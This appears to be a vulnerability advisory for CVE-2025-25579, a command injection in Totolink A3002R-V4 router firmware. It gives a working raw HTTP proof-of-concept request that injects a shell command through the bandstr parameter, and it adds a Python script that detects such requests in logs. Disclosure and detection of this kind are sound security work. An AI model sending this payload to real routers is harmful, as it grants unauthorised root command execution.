
@regainer27
Last active March 27, 2025 05:32

CVE-2025-25579: Totolink A3002R-V4 Remote Command Execution

Vulnerability Details

  • Affected Firmware: Totolink A3002R-V4.0.0-B20230531.1404
  • CWE-ID: CWE-78 (OS Command Injection)
  • Root Cause: The bandstr parameter is passed unsanitized by the formMapDelDevice handler (FUN_0045a1f8, at address 0x0045a2a4) in the boa web server, allowing OS command injection.
  • Impact: Remote unauthenticated attackers can execute arbitrary commands as root.

Vendor Information

Proof of Concept

```http
POST /boafrm/formMapDelDevice HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/multi_ap_popup_client_details.htm
Upgrade-Insecure-Requests: 1

sessionCheck=eac3d25a37ff88c5d813f312586baec9&submit-url=%2Fmulti_ap_popup_client_details.htm&macstr=123&clientoff=no&bandstr=123;echo%20123456%20> /tmp/rec1.txt
```

PoC result as follows:
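As an added detection example (not part of the original gist), the following scans captured HTTP requests for the pattern described above: POSTs to `/boafrm/formMapDelDevice` whose `bandstr` (and, as an assumption, `macstr`) value carries shell metacharacters. The sample traffic is constructed; the session value and MAC are placeholders.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample traffic (not from the original gist): (method, path, body).
# The second body mirrors the shape of the PoC: a shell metacharacter appended to bandstr.
SAMPLE_REQUESTS = [
    ("POST", "/boafrm/formMapDelDevice",
     "sessionCheck=aaaa&submit-url=%2Fmulti_ap_popup_client_details.htm"
     "&macstr=00:11:22:33:44:55&clientoff=no&bandstr=2.4G"),
    ("POST", "/boafrm/formMapDelDevice",
     "sessionCheck=aaaa&submit-url=%2Fmulti_ap_popup_client_details.htm"
     "&macstr=123&clientoff=no&bandstr=123;echo%20123456%20>%20/tmp/rec1.txt"),
    ("GET", "/multi_ap_popup_client_details.htm", ""),
]

VULN_PATH = "/boafrm/formMapDelDevice"
# bandstr is the parameter the advisory names; macstr is watched too because it
# travels in the same form (assumption, not stated on the page).
WATCHED_PARAMS = ("bandstr", "macstr")
# Characters that let a value break out of the intended shell argument.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r\\]")


def parse_form_body(body):
    """Split an application/x-www-form-urlencoded body on '&' only.
    Splitting on ';' as well (older urllib behaviour) would move the injected
    command into its own bogus parameter and hide it from the check."""
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def inspect_request(method, path, body):
    """Return [(param, decoded_value), ...] for watched params carrying shell metacharacters."""
    if method != "POST" or path != VULN_PATH:
        return []
    params = parse_form_body(body)
    return [(name, v) for name in WATCHED_PARAMS
            for v in params.get(name, []) if SHELL_META.search(v)]


def scan(requests):
    """Map request index -> findings for every request that looks like an injection attempt."""
    return {i: hits for i, (m, p, b) in enumerate(requests) if (hits := inspect_request(m, p, b))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_REQUESTS).items():
        print(f"request {idx}: {hits}")
```

Feed it decoded request bodies from a proxy or web-server log; a benign band selection such as `2.4G` passes while the PoC body is flagged.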
